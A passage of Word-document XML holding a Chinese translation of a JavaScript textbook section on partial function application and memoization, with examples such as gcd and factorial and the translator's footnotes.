        <w:t xml:space="preserve">var f=function(x,y,z){return </w:t>
      </w:r>
      <w:r>
        <w:t>x*(y-z);};//</w:t>
      </w:r>
      <w:r>
        <w:t>注意这三个不完全调用之间的区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>partialLeft(f,2)(3,4)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>-2:</w:t>
      </w:r>
      <w:r>
        <w:t>绑定第一个实参</w:t>
      </w:r>
      <w:r>
        <w:t>:2*(3-4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>partialRight(f,2)(3,4)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:t>绑定最后一个实参</w:t>
      </w:r>
      <w:r>
        <w:t>:3*(4-2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>partial(f,undefined,2)(3,4)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>-6:</w:t>
      </w:r>
      <w:r>
        <w:t>绑定中间的实参</w:t>
      </w:r>
      <w:r>
        <w:t>:3*(2-4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>利用这种不完全函数的编程技巧，可以编写一些有意思的代码，利用已有的函数来定义新的函数，参照下面这个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var increment=partialLeft(sum,1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cuberoot=partialRight(Math.pow,1/3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>String.prototype.first=partial(String.prototype.charAt,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>String.prototype.last=partial(String.prototype.substr,-1,1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当将不完全调用和其他高阶函数整合在一起的时候，事情就变得格外有趣了。比如，这里的例子定义了</w:t>
      </w:r>
      <w:r>
        <w:t>not()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，它用到了刚才提到的不完全调用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>not=partialLeft(compose,function(x){return!x;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var even=function(x){return x%2===0;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var odd=not(even);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var isNumber=not(isNaN)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们也可以使用不完全调用的组合来重新组织求平均数和标准差的代码，这种编码风格是非常纯粹的函数式编程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=[1,1,3,5,5];//</w:t>
      </w:r>
      <w:r>
        <w:t>我们要处理的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sum=function(x,y){return x+y;};//</w:t>
      </w:r>
      <w:r>
        <w:t>两个初</w:t>
      </w:r>
      <w:r>
        <w:t>等函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var product=function(x,y){return x*y;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var neg=partial(product,-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>定义其他函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var square=partial(Math.pow,undefined,2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sqrt=partial(Math.pow,undefined,.5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var reciprocal=partial(Math.pow,undefined,-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>现在计算平均值和标准差，所有的函数调用都不带运算符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这段代码看起来很像</w:t>
      </w:r>
      <w:r>
        <w:t>lisp</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var mean=product(reduce(data,sum),reciprocal(data.length));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var stddev=sqrt(product(reduce(map(data,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>compose(square,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>partial(sum,neg(mean)))),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sum),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reciprocal(sum(data.length,-1))));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="8_8_4_Ji_Yi_"/>
      <w:r>
        <w:t>8.8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　记忆</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>8.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中定义了一个阶乘函数，它可以将上次的计算结果缓存起来。在函数式编程当中，这种缓存技巧叫做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>记忆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>memorization</w:t>
      </w:r>
      <w:r>
        <w:t>）。下面的代码展示了一个高阶函数，</w:t>
      </w:r>
      <w:r>
        <w:t>memorize()</w:t>
      </w:r>
      <w:r>
        <w:t>接收一个函数作为实参，并返回带有记忆能力的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>的带有记忆功能的版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>只有当</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>的实参的字符串表示都不相同时它才会工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function memorize(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cache={};//</w:t>
      </w:r>
      <w:r>
        <w:t>将值保存在闭包内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>将实参转换为字符串形式，并将其用做缓存</w:t>
      </w:r>
      <w:r>
        <w:t>的键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var key=arguments.length+Array.prototype.join.call(arguments,",");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(key in cache)return cache[key];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return cache[key]=f.apply(this,arguments);</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memorize()</w:t>
      </w:r>
      <w:r>
        <w:t>函数创建一个新的对象，这个对象被当做缓存（的宿主）并赋值给一个局部变量，因此对于返回的函数来说它是私有的（在闭包中）。所返回的函数将它的实参数组转换成字符串，并将字符串用做缓</w:t>
      </w:r>
      <w:r>
        <w:t>存对象的属性名。如果在缓存中存在这个值，则直接返回它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>否则，就调用既定的函数对实参进行计算，将计算结果缓存起来并返回，下面的代码展示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>memorize()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回两个整数的最大公约数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用欧几里德算法</w:t>
      </w:r>
      <w:r>
        <w:t>:http://en.wikipedia.org/wiki/Euclidean_algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function gcd(a,b){//</w:t>
      </w:r>
      <w:r>
        <w:t>这里省略对</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>的类型检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var t;//</w:t>
      </w:r>
      <w:r>
        <w:t>临时变量用来存储交换数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>b)t=b,b=a,a=t;//</w:t>
      </w:r>
      <w:r>
        <w:t>确保</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(b!=0)t=</w:t>
      </w:r>
      <w:r>
        <w:t>b,b=a%b,a=t;//</w:t>
      </w:r>
      <w:r>
        <w:t>这是求最大公约数的欧几里德算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var gcdmemo=memorize(gcd);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>gcdmemo(85,187)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>17//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，当我们写一个递归函数时，往往需要实现记忆功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们更希望调用实现了记忆功能的递归函数，而不是原递归函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var factorial=memoize(function(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return(n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=1)?1:n*factorial(n-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>factorial(5)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>120.</w:t>
      </w:r>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的值也有缓存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>参数有形参（</w:t>
      </w:r>
      <w:r>
        <w:t>parameter</w:t>
      </w:r>
      <w:r>
        <w:t>）和实参（</w:t>
      </w:r>
      <w:r>
        <w:t>argument</w:t>
      </w:r>
      <w:r>
        <w:t>）的区别，形参相当于函数中定义的变量，实参是在运行时的函数调用时传入的参数。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>有些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现并未严格遵守这条规则，比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>就允许在</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句中出现条件函数声明。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>这个术语最初是由</w:t>
      </w:r>
      <w:r>
        <w:t>Martin Fowler</w:t>
      </w:r>
      <w:r>
        <w:t>提出的，参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://martinfowler.com/dslwip/MethodChaining.html</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>需要注意的是，使用</w:t>
      </w:r>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符代替</w:t>
      </w:r>
      <w:r>
        <w:t>i f</w:t>
      </w:r>
      <w:r>
        <w:t>语句的前提是</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>必须预先声明，否则</w:t>
      </w:r>
      <w:r>
        <w:t>a=a</w:t>
      </w:r>
      <w:r>
        <w:t>||[]</w:t>
      </w:r>
      <w:r>
        <w:t>会报引用错误，在这个例子中</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>是作为形参传入的，相当于</w:t>
      </w:r>
      <w:r>
        <w:t>var a</w:t>
      </w:r>
      <w:r>
        <w:t>，即已经声明了</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>，所以这样用是没有问题的。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>当函数的实参可选时往往传入一个无意义的占位符，惯用做法是传入</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>作为占位符，当然也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>作为占位符。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>原文用了三个单词来描述</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不定实参函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>variadic function</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>variable arity function</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>varargs function</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>variadic</w:t>
      </w:r>
      <w:r>
        <w:t>的含义是实参（模板）的顺序不定，</w:t>
      </w:r>
      <w:r>
        <w:t>variable arity</w:t>
      </w:r>
      <w:r>
        <w:t>的含义是实参的个数不定</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>varargs</w:t>
      </w:r>
      <w:r>
        <w:t>的含义是实参的值不定，这里统一译成</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不定实参函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。本书采用最通俗的术语</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不定实参</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>vararg</w:t>
      </w:r>
      <w:r>
        <w:t>）。作者在这里选用最常见的一种情形，即</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>实参的值不定</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，但在后续章节中，这个单词的含义应当是包含前两种情形的，即包含实参顺序不定和实参个数不定。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>这看起来不足为奇，但如果你对</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>很熟悉，你会发现</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数是程序的一部分，但无法被程序操作。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>通常我们认为的排序都是按照值从小到大，实际上排序参照的维度不同排序结果也不尽相同。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中这种说法不</w:t>
      </w:r>
      <w:r>
        <w:t>完全正确，比如，在有些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的扩展中就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>来声明语句块内的变量，详细内容请参照第</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
